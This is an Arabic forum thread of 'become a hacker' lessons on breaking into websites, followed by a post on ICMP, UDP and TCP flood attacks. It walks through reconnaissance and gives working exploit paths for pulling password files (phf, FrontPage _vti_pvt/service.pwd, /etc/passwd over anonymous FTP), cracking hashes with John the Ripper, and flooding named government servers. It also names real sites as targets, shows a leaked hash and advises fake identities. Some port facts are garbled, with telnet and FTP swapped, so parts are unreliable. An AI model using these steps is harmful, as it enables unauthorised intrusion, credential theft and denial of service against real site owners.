كيف تصبح مخترقــا ( هـاكر ) من أ - ي

    تمر دردشة الساحة الخاصة بالمتصفح والموبايل بفترة صيانة دورية هذا ونعتذر للجميع على الإنقطاع المؤقت بإمكانكم المشاركة في المنتدى لحين عودتها :)

    • كيف تصبح مخترقــا ( هـاكر ) من أ - ي

      بسم الله الرحمن الرحيم

      لقد نشرت هذه الدروس حتى تصبح هكر من الدرجه الأولى ولكن ،، ليس على أخوتك المسلمين .....

      الدرس الأول من دروس اختراق المواقع :

      في البداية يجب أن تعلم بعض المعلومات البسيطة مثل :
      هاكر = مخترق = hacker
      هاكرز = مخترقون = hackers = hackerz
      admin = المدير
      OS = Operating System = نظام تشغيل
      بورت = منفذ = Port
      سيرفر = خادم = Server : وهي عبارة عن أجهزة كمبيوترفائقة القدرة ذات قدرة كبيرة على المعالجة وتخزن بها ملفات المعلومات وقواعد بيانات الشبكة والبرامج المختلفة بها.


      لاختراق أي موقع تحتاج لمعرفة بعض المعلومات عن الهدف(الموقع) كنظام التشغيل الذي يعمل عليه والخدمات الموجودة بالموقع


      لا تتعجل فشرح هذه الأمور قادم لتعرف أي الثغرات ستسخدم أوستستغل لاختراق الموقع وفي هذا الملف سأشرح لك كيفية عمل ذلك أما في الدرس الثاني فسأشرح لك بإذن الله
      كيفية الاستفادة من تلك المعلومات.


      1- عليك عمل بورت سكان Port Scan لمعرفة البورتات أو المنافذ المفتوحة بالموقع.من لينكس يمكنك إستخدام nmap لكن لن أشرح هذه العملية من اللينكس.
      أمـا من الويندوز يمكنك استخدام برنامج Super Scan .
      وتفيدك هذه العملية فيما بعد في نزع التوقيع فمثلا لو وجدت ان موقعا مفتوح به البورت 21 وهو للتلنت
      يمكنك الذهاب إلى تلنت وهو برنامج يأتي مع الويندوز

      start==>run

      إبدأ==>تشغيل

      ثم اكتب

      telnet
      بعد ذلك إضغط على قائمة
      connect
      ثم
      Remote System
      ستظهر لك شاشة اكتب اسم الموقع في Host Name واترك المنفذ كما هو telnet
      ثم اضغط
      connect
      سيتصل بالموقع وحينئذ سيظهر نظام التشغيل للموقع.
      وأهم البورتات هي
      21 للتلنت وهي خدمة تسمح لمستخدميها بالتصال بأي جهاز آخر يستعمل نفس الخدمة
      23 للإف تي بي أو بروتوكول نقل الملفات FTP=Files Transefiring Protocol
      والبريد الصادر والوارد 110 - 25

      21 FTP
      22 SSH
      23 Telnet
      25 SMTP
      79 Finger
      80 HTTP
      110 POP3

      وللإتصال ببورت معينمن التلنت اكتب البورت في خانة Port مكان كلمة Telnet
      هذا الموقع يمكنك من معرفة العديد من الأشياء عن اي موقع
      psyon.org/tools/index.html


      2- الخطوة الثانية هي ما يسميه البعض نزع التوقيع أو فحص البانر.
      والبانر هو الرسالة التي تراها حين تحاول الاتصال بجهاز ما (أو موقع فلا فرق ) عبر منفذ (بورت) معين.
      فمثلا حين تحاول الاتصال عبر البورت 23 وهو للتلنت مع جهاز يعمل على نظام لينكس ماندريك سيظهر لك الآتي :


      Linux Mandrake release 6.1 (Helios)
      Kernel 2.2.13-4mdksmp on an i686
      login:


      ما عرفناه من هذا أن هذا الجهاز يعمل على نظام تشغيل لينكس مانريك 6.1 والنواة هي 2.2.13.


      3- شء آخر عليك ملاحظته هو رسائل الأخطاء! ومن أشهرها الرسالة 404 Error وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
      إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطيرة لكنها تفيد
      في عملية الاختراق


      * عليك ان تعرف أن الموقع هو عبارة عن جهاز كمبيوتر لكنه يعمل 24 ساعة ويوجد به ملقم ويب (خادم) Web Server ويعمل على نظام تشغيل وأنت حين تخترق فإنك تخترق هذا
      الجهاز الذي توجد عليه كل ملفات الموقع وقد يوجد على الجهاز أكثر من موقع مثل شركات الإستضافة وهذه تكون ضربة الهاكر الكبرى...
      يجب عليك معرفة الأشياء التالية عن اي موقع :

      - معرفة &##1606;وع وإصدارة ملقم الويب هل هو IIS4 - IIS5 هل هو Apache ....
      - معرفة &##1606;ظام التشغيل وإصدارته هل هو Windows200 مثلا أو Linux redhat 6.2 مثلا...
      وعليك معرفة ذلك لأن لكل نظام تشغيل الثغرات الخاصة به...وأيضا توجد ثغرات لملقم الويب مثل ثغرة اليونيكود لسيرفرات IIS.
      - معرفة &##1603;ل سكربتات بيرل وسي جي آي الموجودة بالموقع مثل المنتديات وسجل الزوارأو عداد الزوار وهكذا.....
      - وأيضا &##1605;عرفة كل الخدمات الأخرى بالموقع كالبريد وغيرها...ومثلا معرفة نوع وإصدارة سيرفر الإف تي بي إن وجد بالموقع (حسب البورت سكان كما سبق)
      وأيضا مفسر نصوص بيرل إن وجد ... كل هذه الأشياء يمكنك إيجاد ثغرات لها...حسنا كيف تعرف هذه المعلومات عن الموقع


      وكيف تحصل على ثغرات لها؟

      أولا كيف تعرف هذه الأشياء؟


      - معرفة &##1606;ظام التشغيل.يمكن معرفة نظام التشغيل من التلنت إن وجد بالموقع كما سبق.
      ويمكنك معرفة ملقم الويب ونظام التشغيل من بعض البرامج أو من هذا الموقع
      netcraft.com
      و
      netcraft.net

      واكتب اسم الموقع في المكان المخصص لذلك ثم اضغط على Lookup أو انتر.
      سيظهر لك الملقم و نظام التشغيل وإصدارتيهما مثلا هذه معلومات عن أحد المواقع
      عن طريق الموقع السابق
      Apache/1.2.6 FrontPage/3.0.4.1 on FreeBSD
      يظهر هنا أن ملقم الويب هو
      Apache
      النسخة/الإصدارة
      1.2.6
      مع دعم الفرونت بيج
      ونظام التشغيل يأتي بعد كلمة on وهو
      FreeBSD
      يمكنك الآن البحث عن ثغرات لهذه النسخة من الملقم أو نظام التشغيل
      والفرونت بيج توجد به الكثير من الثغرات ويهمنا منها
      _private
      _vti_pvt
      _vti_cnf
      وأحيانا
      _vti_bin


      ستتعلم كيفية استغلال هذه الثغرات في الدرس الثاني...
      - يمكنك &##1605;عرفة سكربتات تبيرل وسي جي آي الموجودة بالموقع عن طريق الذهاب إلى الصفحة الرئيسية للموقع
      (ليست صفحة الترحيب كما في بعض المواقع) بل الصفحة التي تستطيع منها التعامل مع الموقع والتي
      قد ترى بها محرك بحث أو منتدى أو قائمة تصويت أو قائمة بريدية أو أي مربع يطلب منك كتابة أي معلومة.
      (ملحوظة بعض هذه المربعات قد تكون جافا سكريبت)
      ثم إضغط بالزر الأيمن للفأرة في أي مكان من الصفحة واختر من القائمة التي ستظهر إظهار المصدر
      View Source
      وابحث فيها عن أسماء ملفات تنتهي بـ
      .pl و .cgi
      ويمكنك البحث عن ثغرات لها ..(بعد قليل)
      - يمكنك &##1605;عرفة سيرفر البريد بعد ذلك ونوع سيرفر الإف تي بي الخاص يالموقع
      من خلال عملية نزع التواقيع كما سبق بالاتصال بالموقع من البورتات 25 - 21 - 110

      حسنا إنتهت الآن الآن عملية جمع المعلومات عن الموقع....
      عليك الآن البحث عن ثغرات لها....ستنشر في الدرس غدا لذا أرجــو متـابعة الدرس للفائده

      تقبلـــــو تحياتي
      الأمير
    • بعد أن حصلت على المعلومات عن الموقع عليك البحث لما يمكن أن تجد له ثغرات في المواقع الموجودة بالأسفل هنا
      وستتعلم الآن ما يأتي :

      هذا الملف يحتوي على :
      - ماهي ا&##1604;ثغرات:
      [ تعريف لها + أسماؤها باللغة الإنجليزية + بعض المصطلحات + ..... ]
      - أنواع &##1575;لثغرات.
      [ ثغرات المتصفح + الاستثمارات أو الاكسبلويتس]
      - كيفية &##1575;ستثمار الثغرات.
      [ استثمار ثغرات اليونيكود والمتصفح - استثمار الاستثمارات في ويندوز - في لينيكس ]
      - أشياء &##1605;تفرقة.
      ----------------------------------------------------------------------

      بسم الله الرحمن الرحيم :



      1- ماهي الثغرات ؟
      الثغرات هي أخطاء برمجية في برامج معينة مثل سيرفرات المواقع وأي برامج اخرى ، لأنها من صنع البشر لذا
      يجب أن تحتوي على أخطاء أو ( ثغرات) وهناك أنواع أخرى عبارة عن برامج مصممة ومكتوبة بلغات معينة
      لاستغلال ثغرة معينة.
      ويطلق عليها أسماء كثير مثل :
      Exploits - Bugs - holes - security holes - vulnerabilities

      2- أنواع الثغرات :


      أولا : ثغرات المتصفح : هي ثغرات يتم استغلالها من المتصفح
      وتلحق باسم الموقع ولها أنواع مثل اليونيكود وثغرات
      السي جي آي CGI bugs وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
      .
      ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
      الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل:
      /cgi-bin/passwd.txt
      إذا كان الموقع هو
      somesite.com
      فتكتب الثغرة هكذا في المتفح
      somesite.com/cgi-bin/passwd.txt
      هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
      المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
      طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين
      (حتى هذه الثغرة يمكن ألا تصلح معهم )
      أما الثغرات الأخرى الخاصة بالمتصفح فيمكنك التأكد من وجودها فقط من خلال المتصفح ثم الحصول
      على استثمار لها
      الاستثمار Exploit :
      هو برنامج صغير يكتب بلغة برمجة معينة ويمكن الاستفادة منه في استغلال ثغرة معينة موجودة بالموقع

      وتكتب ببعض لغات البرمج مثل
      - لغة سي C
      -لغة بيⵁل Perl
      - لغة ال&##1594;لاف أو شل shell
      ويمكن استثمار هذه الثغرات من الويندوز لكن يجب توفر بعض البرامج أما من اللينيكس فهو أفضل ولا يجب توفر
      أي برامج..

      - كيفية &##1575;ستغلال الثغرات :
      1- ثغرات المتصفح تم ذكرها بالأعلى وهذه بعض المواضيع الممتازة عن ثغرات اليونيكود والمتصفح :

      ثانيا : الاكسبلويتس أو الاستثمارات Exploits
      الاستثمارات أو الاكسبلويتات
      Exploits
      وهي كما قلنا برامج تكتب بلغات برمجة معينة لاستغلال ثغرة في الموقع
      إما في سيرفر الموقع أو في نظام التشغيل أو في بعض البرامج الموجودة على الموقع مثل المنتديات وأي
      برامج موجودة على الموقع مثل قوائم الاستفتاء أو سجل الزوار أو حتى عداد الزوار باختصار كل سكربتات
      بيرل وسي جي آي.
      ( راجع الدرس الأول )

      عندما تجمع المعلومات عن الموقع كما في الدرس الأول مثل معرفة نوع سيرفر الموقع
      أو برنامج الإف تي بي الذي يستخدمه الموقع
      مثلا إن علمت أن سيرفر الموقع هو
      IIS4
      فعليك الذهاب إلى أحد مواقع الهكرز المكتوبة بالأسفل والبحث عن ثغرة أو استثمار لها
      وابحث عن
      IIS 4
      وبعد أن تحصل على الاكسبلويت عليك إستثماره :
      أولاً : الاستثمارات في ويندوز :
      - إذا كا&##1606; الاكسبلويت مكتوبًا بلغة بيرل تستطيع ترجمتها أو عمل Compiling لها عن طريق برنامج
      Active Perl
      من شركة Active state
      activestate.com
      عن طرق الأمر التالي في الدوس
      perl exploit.pl
      ثم تظهر طريقة الاستعمال التي يجب أن تتبعها.
      الوصول للدوس من هنا
      start==>run
      ثم اكتب command
      إبدأ==>تشغيل==>command
      - ام الا&##1603;سبلويتات المكتوبة بلغة سي
      فيلزمك برنامج لترجمتها يسمى
      Borland C ++ Compiler
      حاول أن تجده بنفسك.
      - أماالⵕكتوبة بلغة شل فلا يوجد طريقة لاستغلالها في ويندوز على حد علمي.

      ثانيًا : الاستثمارات في لينيكس :
      لينيكس نظام التشغيل الشهير هو نظام رائع جدا ومع أنه تتوفر فيه كل البرامج التي تساعد الهاكر إلا
      أنه ليس للهاكرز فقط
      وتكمن قوته في سطرالأوامر
      إذا أردت ترجمة ثغر ة مكتوبة بلغة سي C أولا يجب عليك تحويلها إلى برنامج تنفيذي عن طريق الأمر

      gcc exploit.c -o exploit

      ثم تشغيل الملف وقراءة التعليمات

      أما إن كام مكتوبا بلغة بيرل فقط اكتب اسم الملف وستظهر لك طريقة التشغيل والباقي عليك..

      -----------------

      مواقع أمن رائعة يمكنك البحث فيها عن ثغرات ومواقع هكرز عربية وأجنبية
      وأنصجك بشدة بالتسجيل في قوائمهم البريدية حيث يمدونك بأحدث الثغرات أولاً باول ويوميا
      نصيحة : استخدم بريدًا وهميا بمعلومات وهمية وأسماء وهمية


      securityfocus.com

      securiteam.com

      7azm.net/vb


      nafitha.org

      blacksun.box.sk

      packetstorm.decepticons.org

      antionline.com


      blacksun.box.sk/tutorials.html

      securitywriters.org/texts/hackfaq.php#top

      securitywriters.org/texts.html

      thenewbiesarea.com/texts.shtml#top

      ussrback.com

      hashash.org/vb

      nor2000.com

      icefortress.com/guest/essays/essays1.html

      neworder.box.sk

      securitywriters.org

      nafitha.com

      packetstormsecurity.nl

      securetips.com

      wiretrip.net

      secureroot.com


      rootshell.com ===> مغلق ولا أعلم إن كان سيعود

      ukrt.f2s.com ===> خاص لثغرات السي جي آي وبيرل إن وجدت على الموقع إبحث عنها هنا


      لا تنسوا غداً إن شاء الله

      الأمير
    • معلومات قيمة تسلم الانامل التي كتبت

      لك من القلب أغلى تحيه


      لا تحرمنا من ابداااعك ومن طلتك الراااااائعه
      أكتب ما اشعر به وأقول ما أنا مؤمن به انقل هموم المجتمع لتصل الي المسئولين وفي النهاية كلنا نخدم الوطن والمواطن
    • إبن الوقــبــــــــه

      [TABLE='width:70%;'][CELL='filter: dropshadow(color=gray,offx=4,offy=4) shadow(color=burlywood,direction=135) glow(color=purple,strength=5);']
      سلمت يداك الكريمتـان يا مصباح الساحه ولك شكري وتقديري على المشاركــة في ساحـــة الكمبيوتر
      الأمير
      [/CELL][/TABLE]
    • وألحين دعونـــا نبدا الإختراق

      اول خطوة في الاختراق واللي هي اخذ المعلومات يعني نعرف الموقع الفلاني ايش الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.

      الملقمات اشهرها اثنين
      1- (IIS) من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها)
      2- (apache): من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.

      الآن عندنا موقع كيف نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع netcraft.net ادخله تلاقي مربع
      هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق (في شريط عنوان الموقع) مثلا نحط موقع البيت الابيض اللي هو whitehouse.org
      ملاحظة: نكتبه من غير من غير //:http ومن غير / الي بآخر العنوان يعني من غير الي بالأحمر http:/whitehouse.org/index


      uptime.netcraft.com/up/graph....whitehouse.org راح يطلع لنا التالي

      The site whitehouse.org is running Microsoft-IIS/5.0 on
      Windows 2000
      طيب الحين عرفنا معلومتين مهمتين اول شيء انه شغال على الملقم IIS5.0
      ثاني شيء شغال على نظامWindows 2000

      حلو اول شيء نجرب ثغرات IIS5.0 عليه (راح احطها بعد الموضوع) <1>
      إذا مانفع شيء نشوف ثغرات نظام Windows 2000 (راح احط الموقع بعدالموضوع) <2>
      طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات IIS وهي عبارة عن عناوين طويلة تحطها بعد
      عنوان الموقع. راح احط امثلة عليها.
      طيب لنفرض انه ماطلع فيها ثغرات؟

      نشوف محتويات الموقع نفسه نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي بعد الموضوع.
      طيب لو كان السيرفر اباتشي؟ خلونا ناخذ مثال موقع ارانك arank.com لو حللناه بالنيت كرافت راح نشوف النتيجة التالية

      The site arank.com is running Apache/1.3.20 (Unix)
      mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
      mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4
      OpenSSL/0.9.6 on Linux

      طيب هنا يهمنا ثلاث اشياء

      الملقم وهو Apache 1.3.20 و دعم فرونت بيج FrontPage/5.0.2.2510
      وهذه مليانة ثغرات والثالث النظام وهو Linux

      طيب الملقم اول شيء Apache من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.
      نشوف دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد _vti_pvt و _private هذه اللي نحتاجها غيره مامنه فايدة.
      داخل المجلدين راح نلاقي اربع ملفات مهمة وهي service.pwd و users.pwd و authors.pwd و adminstators.pwd ويعتبر هذا اخطر ملف.
      طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال goodyco:CalXS8USl4TGM وهذا من موقع قوديgoody.com.sa/_vti_pvt/service.pwd
      طيب الحين goodyco اليوزر والباسس مشفر واللي هو CalXS8USl4TGM
      وشلون ينفك؟ ينفك ببرنامج اسمه john the repaier تنزله وتحط الملف المشفر (مع اليوزر) بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي john -i PASSWORD.FILE وعاد استناه يطلع لك الباسس طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين

      1- معرفة النظام تقدر تطلعه من ابدا وتشغيل واكتب telnet بعدين أكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته
      2- المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال C وهذه ماتشتغل إلا عاللينكس فقط

      ================ ================

      <1> neworder.box.sk/ هذا الموقع مفيد جدا تكتب مثلا (فوق بالمربع اللي عاليمين) IIS او apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته .
      <2> ussrback.com/ الموقع هذا ممتاز جداً تروح لـ EXPLOITS اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من c و perl و يوني كود .

      هكذا نكون خلصنــا هذا الدرس وإلى لقـــــاء جديد يجمعنــــا غداً
      الامير
    • لتحديد نظام السيرفر للموقع المستضاف يعني اما ان يكون يونكس او لينكس او وندوز ان تي
      تدخل على الاميل مـــــالك
      وتدخل اوبشن
      ثم تختار الامر Preferences
      Customize the appearance and operation of your Hotmail account
      وبعدها تختار الخيار
      Message Headers
      وتضع الخيار هذا
      Advanced
      ثم تذهب الى الاميل مـالك وتفتح رسالة سوف تجد الاي بي للشخص او الموقع الذي يرسل لك أي رساله
      لتحديد رقم او نظام السيرفر للموقع كيف ؟؟؟
      ترسل رساله مجهوله للموقع الذي تريده كيف
      لنفرض ان الموقع هوه msn.com
      نرسل رساله مثلا kjhkjhkhkl@msn.com
      طبعنا الهوت ميل راح يرد عيك بعد دقايق بالرسـاله لأن الرساله إلي بعثتهـا خطى ويجيبلك الاي بي مـال الموقع الموقع او السيرفر
      مـالــه يعني نظامهم .
      هذا بالنسبه للتحديد نظام الموقع لكي تسهل المهم.

      =======

      المواقع ينقسمن حسب نظرتي انا لها الى قسمين
      الأول إختراق مواقع مجانيه ، مثال kkkk.8m.com
      الثاني إختراق مواقع لها دوماين نايم كامل مثال msn.com

      ،،،، لكل موقع إختراق كامل وإختراق جزئي ، الفرق بينهما أن الإختراق الكامل هون الوصول الى الروت
      لهذا الموقع (المواقع المجانيه ما لها روت) وأن الإختراق الجزئي هو إختراق شئ في هذا الموقع مثل ،
      قاعدة بينات أو منتدى أو حتى محرك بحث ! أو إختراق نظام البريد الإلكتروني إن وجد في الموقع

      عندنا الحين مثال لإختراق موقع على سيرفر بسيط BasicServer
      اول شئ نفحص الموقع ، ونشوف وش النظــام الي يشغله ، وأيش البرامج المثبته عليه ، وكل شئ
      كيف نفحص الموقع ؟ ونعرف نظام التشغيل له ؟
      ممكن من برامج مثل برنامج
      Site Scan
      وممكن أيضا نروح لتلنت
      طبعنا اومر التلنت كثير وكل امر له وظيفته
      ونكتب
      XXXX.com
      ونترك المنفذ مكتوب فيه
      telnet
      وإذا أتصل بالموقع فهذا يعني أن الموقع موجود عليه تلنت ، سوف يظهر لك على الشاشه إسم نظام التشغيل ،
      في التلنت نفسها .
      وهناك أيضا طريقه أخرى إذا لم يكون لسيرفر تلنت ، إذهب الى أحد المواقع أو قم بتنزيل أحد البرامج التي تعمل
      whois
      وأكتب رقم الآي بي للموقع

      والآن نكمل الكلام ..... بس اهم شي لازم تعرفواإنــه الين هنيه كله في معلوم .....!!!
      يالله
      لنفرض أن نظام التشغيل هو مثلا لينكس 4 ، من المعروف ان لكل نظام تشغيل مكان تحفظ كلمات السر مشفره ،
      هل تعلم هذي الأماكن ، يمكن معرفتها من آخر هذه الصفحه ، بالنسبه لنظام لينكس 4 فملف الباسورد موجود
      في هذا الإمتداد .
      xxxxxx.com/etc/passwd
      عليك الآن تشغيل أحد برامج نقل بالإف تي بي ، والإتصال بالموقع ، وضع إسم المستخدم وكلمة السر هكذا
      UserName : anonymouse
      Password : ko@ko.k0o
      بالنسبه لكلمة السر فهي تكون أي بريد الإلكتروني ولبيس مفروضا علينا أن يكون صحيح
      والآن قم بسحب ملف الباسورد ، وعند فتحه ستجده مشفر ، كل ما يهمنا هو السطر الأول ، وهذا مثال
      rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/kshdoes
      ويبدوا لنا أن إسم المستخدم هو
      rcc
      وكلمة السر هي
      uXDg04UkZgWOQ
      ولكن مشفره
      كيف نرفع عنها التشفير ؟
      أفضل طريقه هي غستخدام برنامج
      John The Ripper
      وهنا مثال لتشغيل هذا البرنامج من الدوس

      Microsoft(R) Windows 98
      C)Copyright Microsoft Corp 1981-1999.(

      C:\WINDOWS\Desktop\john the ripper>john -i:all passwd.txt

      by Solar Designe 97,John the Ripper Version 1.3 Copyright (c) 1996

      Loaded 1 password

      وكل ما علي هو إنتظار كلمة السر ، بالنسبه لمن أراد تنزبل البرنامج ، فهو متوفر في أغلب مواقع الكراك ،
      وإذا ما لقيته ،، وولبرنامج طرق كثيره لفتح التشفير
      مثال آخر لإختراق موقع
      هناك ثغره تسمى بي إتش إف
      وهي ثغره كشفت في آخر عام 1998 ولن اذكر عنها شي سوى كيفية استخدامها
      إفتح المتصفح وأكتب
      xxxxxxxx.com/cgi-bin/phf?Qalias=الملف المراد عرض
      ه
      هذه الثغره موجوده في السي جي آي ، وهي تبدوا على أنها أنتهت ، ولكن سنجعلها مثال
      نكتب في مكان المف المراد عرضه ، عنوان ملف لداتابيس أو ملف الباسورد أو ملف المدير لبرنامج
      قرونت بيج سيرفر إن وجد على السيرفر
      هناك برامج تقوم ببحث او عمل اسكان على الموقع بحيث يظهر لك جميع الثغرات الموجوده فيه وطريقة
      اختراق كل ثغره وطريقة تقفيل كل ثغره .
      واسم البرنامج شدو سكان . والبرنامج ممتاز جدا .
      لكن يجب عليك متابعة الثغرات الامنيه باستمرار وتجدد لكي يكون لديك علم بها وبطرق اختراقها
      وهناك مواقع ترسل لك مستجدات هذا الموضوع باستمرار
      هناك ثغرات كثيره تعتمد على phpاوcgiاوberl
      والبرامج كثيره ويختلف كل برنامج وادائه واضن انه في احد من الشباب شرح الفكره في موضوع
      اخترق المواقع مع برنامج الروسي او شي مثل كذا......
      اتمنا ان أكــون قد اوصلة على الاقل بعض المعلومات التي يمكن ان تفيدكم في هذا المجال والسموحــه على التقصير.

      ==================

      تحياتي الحـاره لكم يا رواد الســــاحه
      الأمير
    • أنواع الهجوم على الأجهزة والحمـايه منهـا

      هناك أنواع مختلفة وكثيرة جدا من الهجوم على جهازك أثناء العمل على الشبكة
      (أكثر بمراحل من أن اجمعها في موضوع واحد) ولكن سألخص بروتوكولات الأتصال هنا وطرق الهجوم عليها وسبل الحماية منه وانظمة التشغيل المتضررة بكل هجوم.


      النوع الأول :
      هجوم الـ(ICMP) او ما يسمى بـ (بروتوكول التحكم برسائل الأنترنت)
      (InternetControlMessageProtocol). وهو يعتمد على أرسال رسائل خطأ مضمونة في حزمة واحدة على التي سي بي نفسه TCP/IP. على سبيل المثال أذا اردت الأتصال بهوست معين مثل سيرفر الايرسي (IRC Servers) وتجد صعوبة في الأتصال به وبرسالة مثل (Host Unreachable) أو (Connection Time Out) وهو من نوع (ICMP_Unreach Packets) أو حزم عدم الوصول.
      والـICMP يمكن أستخدامه أيضا لمعرفة معلومات عن شبكة معينة.
      والسؤال الآن هو كيف يمكن لهذا الهجوم ان يلحق الضرر بك؟ والأجابة هي انه عند ارسال ارسال حزم كبيرة و سريعة من البنق Ping الى TCP/IP الخاص بك (وهذا ما يسمى بالفلود Flood) ويتوجب على جهازك تحليل كل حزمة وتفصيلها والرد عليها وهذا بالتأكيد مالا يستطيعه لكبر حجمها وكثرتها مما يؤدي غالبا الى عمل ريست للأتصال (Reset Connection) سواء كان اتصال بهوست معين أو بموفو الخدمة الخاص بك ايضا (ISP)!!
      والآن تخيل مثلاً خمسمائة جهاز يوجهون هجوما قويا ومتتاليا على سيرفر معين (مثلا سيرفر israel.gov)،/ هذا السيرفر لن يتمكن من الرد على كل اتصال موجه له بنفس الوقت بهذا الحجم والسرعة العاليين. مما يؤدي غالبا (بأستخدام توقيت وتخطيط مناسب) الى عزل هذا تقريبا عن بقية الشبكة .
      ونوع آخر شهير جدا ويكثر أستخدامه في سيرفرات الايرسي او الشات وهو ICMP_Protocol_Unprotocol وهذا النوع يمكن أستخدامه لفصل أتصالك بسيرفر
      محادثة معين. مثلا سيرفر المايكروسوفت شات لو انك متصل به على سيرفره irc.msn.com عبر المنفذ 6667 (منفذ شبكة محادثة MSN) وحدث انه تم قطع اتصالك بالسيرفر عدة مرات متتالية دون سبب محدد، فأنك قد تعرضت للهجوم على TCP/IP الخاص بك من النوع المذكور سابقا والذي يعتمد على ارسال رسائل عديدة وسريعة الى المنفذ 6667 من جهاز العدو وعبر سيرفر المحادثة واخيرا الى جهازك مما يؤدي الى تضعيف المنفذ 6667 وبالتالي قطع اتصالك بالسيرفر المذكور.

      والحماية من هذا النوع من الهجوم كالتالي:
      برامج عديدة يمكنك استخدامها مثل الفايروول الذي يوفر درجة معقولة من الحماية ضد هذا الهجوم. وهناك ايضا برامج كتبت خصيصا لمنع مثل هذا الهجوم مثل
      Nuke Napper
      ICMP Watcher
      ConSeal PC Firewall
      والتي تقوم بحجب هذه الحزم عن جهازك (Blocking ICMP Packets)
      (ملحوظة: جميع البرامج السابقة لا توفر الحماية مائة بالمائة وانما هي مضمونة بخاصة اذا كنت معرض لهجوم من مصادر محدودة او مصدر واحدبأتصال غير قوي جدا)

      نوع اخر من الحماية هو الباتشات التي تطلقها الشركات مثل الباتش الذي اطلقته مايكروسوفت لمستخدمي ويندوز 95 لأغلاق منفذ 139 ضد هجوم معين منICMP و هو SPing والذي كان يؤدي الى عمل ريست للأتصال بالشبكة بالكامل. وبالطبع تمت معالجة هذا العيب في الأصدارات التالية من ويندوز. وبرغم انه نوع قديم من الهجوم واغلب الأنظمة الآن متوفرة لديها الحماية منه الا اني متأكد بانه مازال هنالك اشخاص معرضين لمثل هذا النوع من الهجوم.

      الأنظمة المعرضة لهجوم الـICMP
      ويندوز 95 وويندوز NT الأصدار القديم كانا معرضين لخطر الهجوم من قبل فلود الـICMP الذي كان يؤدي الى عمل كراش Crash لهما. وبغض النظر عن اي نظام تستخدم فأنه معرض لخطر الفلود من قبل ICMP.

      -----------------------------------------------------------------
      UDP :
      او ما يسمى بـ(UserDatagramProtocol) وهو مصمم لبرامج معينة لا تحتاج الى تقسيم رسائلها الى حزم اصغر وارسالها مثل TCP الذي سيتم شرحه لاحقا. وهو بالضبط كالتي سي بي من حيث تقسيمه الى منافذ متعددة لتتمكن عدة برامج من استخدامه في نفس الوقت. ويحتوي على رأس توجيهي مثل التي سي بي ايضا ولكنه اقصر منه. وعلى كل حال له ارقام للمصدر وارقام للوجهة. وهذا البروتوكول يستخدم غالبا في عملية البحث عن اسم موقع كما سيتم شرحه بالاسفل.
      من السابق نستنتج ان الفلود هذا البروتوكول يكون ضعيف جدا مقارنة بغيره من البروتوكولات وذلك لصغر حجم بياناته. ولكنه هجوم لايمكن تجاهله وبخاصة اذا وصل الى مرحلة عالية وسرعة عالية فأنه يؤدي الى أبطاء اتصالك ونادرا ما يقطع اتصالك.

      الحماية:
      البرنامج الوحيد الذي رأيته ويقوم بالحماية من فلود اليو دي بي هو الفايروول (من نوع كونسيل ConSeal). ولكنني متأكد من وجود أدوات اخرى للحماية منه

      أنظمة التشغيل المتضررة منه:
      جميع اصدارات الويندوز وحتى اليونكس نفسه من الممكن ايقافه اذا وجهت له حزم ضخمة من اليو دي بس في الوقت المناسب

      -----------------------------------------------------
      TCP:
      وهو ما يسمى ببروتوكول التحكم في الأرسال (TransmissionControlProtocol). وهو بروتوكول مسؤول عن تقسيم الرسائل الواردة الى حزم صغيرة ومن ثم يعيد تجميعها بشكل وترتيب جديد ليتمكن جهازك من قراءتها. وفي اغلب البرامج تكون الرسائل صغيرة بحيث يمكن ضمها في حزمة واحدة فقط. مثلا عند كتابتك لموقع في متصفحك فان نظامك يتوجب عليه ان يقوم بعملية التحويل الشهيرة من اسم الى عنوان (شبيه برقم الآيبي) ومن ثم يرسل الأمر بالبحث عنه والذي عادة ما يكون في حزمة واحدة.
      والتي سي بي اي بي بالطبع يقوم بأعمال اخرى اضافة لعملية التقسيم والتجميع فأنه يقوم بالتأكد من وصول المعلومة المطلوبة الى جهازك وأعادة ارسال حزمة الطلب اذا توجب الأمر.
      والسؤال هنا: كيف يمكن الهجوم على بروتوكول كهذا يقوم بتقسيم الرسائل الكبيرة!?
